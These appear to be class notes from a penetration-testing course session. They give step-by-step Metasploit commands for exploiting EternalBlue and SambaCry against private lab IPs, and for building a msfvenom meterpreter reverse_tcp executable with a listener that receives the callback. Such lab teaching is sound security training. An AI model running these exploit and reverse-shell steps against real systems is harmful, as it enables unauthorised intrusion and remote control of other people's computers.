Grade 2 Session 8 ================= Console Based Exploitation 3 Windows 7 --> Eternal Blue Samba Cry --> Eternal Red Application Based Exploitation Payload Based Exploitation Post Exploitation --> Local Privilidge Escalation GUI Based Exploitation --> Armitage Console Based Exploitation 3 ---------------------------- Eternal Blue --> NSA Exploit leaked by Shadow Brokers EternalBlue-Double Pulsar dll --> Dynamic Linked Library File Double Pulsar creates a malicious .dll file and eternal blue executes that malicious .dll file in the target system. Shadow Brokers ---> Fuzzbunch.py Empire --> MSF of NSA Metasploit Module Steps ===== Open a terminal 1. #arp-scan --local Target IP Address --> 192.168.228.138 2. #nmap 192.168.228.138 3. #nmap -sS -sC -sV 192.168.228.138 4. #nmap 192.168.228.138 --script vuln CVE-2017-0143 Open another terminal, start metasploit framework 5. #msfconsole 6. #search CVE-2017-0143 7. #use auxiliary/scanner/smb/smb_ms17_010 8. #options 9. #set rhosts 192.168.228.138 10. #options 11. #run Host is vulnerable to the exploit 12. #use exploit/windows/smb/ms17_010_eternalblue 13. #show options 14. #set rhost 192.168.228.138 15. #options 16. #exploit C:/Windows/System32> --> I got the access of the command prompt For Changing the payload set payload windows/meterpreter/reverse_tcp Samba Cry - Eternal Red ======================= Is the vulnerability for Linux Based OS. SMBv2. NSA Exploit leaked by Shadow Brokers. Open a terminal 1. #arp-scan --local Target IP Address --> 192.168.228.151 2. #nmap 192.168.228.151 3. #nmap -sS -sC -sV 192.168.228.151 4. #nmap 192.168.228.151 --script vuln Open another terminal, start metasploit framework 5. #search is_known_pipename 6. #search cve-2017-7494 exploit/linux/samba/is_known_pipename 7. #use exploit/linux/samba/is_known_pipename 8. #info 9. #options 10. #set rhost 192.168.228.151 11. #run Will Give me raw shell --> Bash Shell Application Based Exploitation ============================== Open the terminal, start with msfconsole 1. #msfconsole 2. #search payload/windows/meterpreter payload/windows/meterpreter/reverse_tcp --> use payload/windows/meterpreter_reverse_tcp payload/windows/meterpreter/reverse_http payload/windows/meterpreter_reverse_tcp Open Another Terminal, for creating a payload - stub 3. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe -p --> selecting the payload windows/meterpreter/reverse_tcp --> is the payload lhost --> attacker's IP Address lport --> Listening attacker's port -f --> file format exe --> executable file > --> destination of the output /root/Desktop/prasheel.exe --> is the output file Go back to the first terminal, exploit, set the listening server 4. #use exploit/multi/handler 5. #show options 6. #set payload windows/meterpreter/reverse_tcp 7. #show options 8. #set lport 8989 9. #set lhost 192.168.0.25 10. #exploit Armitage --> GUI Based Exploitation Graphical Version of Metasploit Framework -----------------------------------------------------------------------------------------------------------------------------------